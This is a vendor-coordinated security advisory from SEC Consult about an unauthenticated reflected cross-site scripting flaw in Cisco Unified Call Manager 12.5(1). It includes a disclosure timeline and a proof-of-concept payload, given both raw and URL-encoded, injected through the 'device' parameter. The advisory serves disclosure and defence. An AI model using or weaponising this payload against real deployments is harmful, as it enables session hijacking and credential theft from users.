Reflected Cross-Site Scripting in Cisco Unified Call Manager

Title

Reflected Cross-Site Scripting

Product

Cisco Unified Call Manager

Vulnerable Version

12.5(1), 12.5(1.10000.22)

Fixed Version

-

CVE Number

-

Impact

low

Found

31.10.2022

By

Stefan Michlits, Werner Schober (Office Vienna) | SEC Consult Vulnerability Lab

The Cisco Unified Call Manger (CUCM) application contains a reflected cross-site scripting vulnerability. The vulnerability can potentially be used to change the contents of the displayed site, redirect to other sites or steal user credentials. Additionally, users are potential victims of browser exploits and JavaScript malware.

​Vendor description

"Consolidate your communications infrastructure and enable your people and teams to communicate simply with the Cisco Unified Communications Manager. The solution features IP telephony, high-definition video, unified messaging, Instant Message and Presence."

"Regional, family run business or global mega-brand? Choose a solution that scales as your organization's needs change. Cisco Unified Communications Manager supports the needs of small and midsize businesses through to the largest enterprises with up to 80,000 users."

"Cisco Unified (CM) supports the latest authentication, encryption, and communication protocols. It complies with key industry certifications, and secures data and communications for customers in financial services, manufacturing, retail, and government across the globe."

Source: https://www.cisco.com/c/en/us/products/unified-communications/unified-communications-manager-callmanager/index.html#~features

 

Business recommendation

SEC Consult recommends Cisco customers to install the latest updates and review the vendor's security note for further information.
Furthermore, an in-depth security analysis performed by security professionals  is highly advised, as the software may be affected from other security issues.

 

Vulnerability overview/description

1) Reflected Cross-Site Scripting

The parameter "device" at the endpoint "/emapp/EMAppServlet" is vulnerable to reflected XSS. If an attacker can lure a user into clicking a crafted link (no authentication required), the attacker could potentially execute arbitrary JavaScript code in the user's browser. The vulnerability can be used to change the contents of the displayed site, redirect to other sites or steal user credentials. Additionally, users are potential victims of browser exploits and JavaScript malware.

Also, a strange behavior was identified, the endpoint "/emapp/EMAppServlet" cannot be rendered correctly by browsers, because an error occurs during client-side XML parsing. The first line in an XML response needs to start at line 1 for browsers to render the response correctly, but the response starts at line 10 as there are some arbitrary newlines added by the server.

Proof of concept

1) Reflected Cross-Site Scripting

To verify this vulnerability, it is sufficient to insert the following text into the parameter "device":

</URL>%0d%0a<script xmlns="http://www.w3.org/1999/xhtml">alert(document.location)</script><URL>

The following GET request can be sent to the server, containing the encoded payload in the vulnerable parameter "device". Prior authentication is not required:
 

/emapp/EMAppServlet?device=%3c/URL%3e%0d%0a%3cscript%20xmlns%3d%22http://www.w3.org/1999/xhtml%22%3ealert%28document.location%29%3c/script%3e%3cURL%3e

Vulnerable / tested versions

The issue was found in Cisco Unified Call Manager version 12.5.1.

Vendor contact timeline
​ 

2022-11-10 Contacting vendor through psirt@cisco.com
2022-11-10 Vendor requests more information. SEC Consult offered to provide.
2022-11-11 Due to the holidays, the vendor asks to move the disclosure date from end of December to January. SEC Consult confirmed.
2022-12-05 Vendor confirmed the issue, but it is not exploitable under current circumstances. Security note planned for 11th January regarding hardening.
2023-01-11 Vendor releases security note.
2023-03-06 Release of security advisory.

Solution

Further information can be found within the vendor's security note:
https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwd56126

Workaround

None

Advisory URL

https://sec-consult.com/vulnerability-lab/

EOF Stefan Michlits, Werner Schober / @2023

Interested to work with the experts of SEC Consult? Send us your application

Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices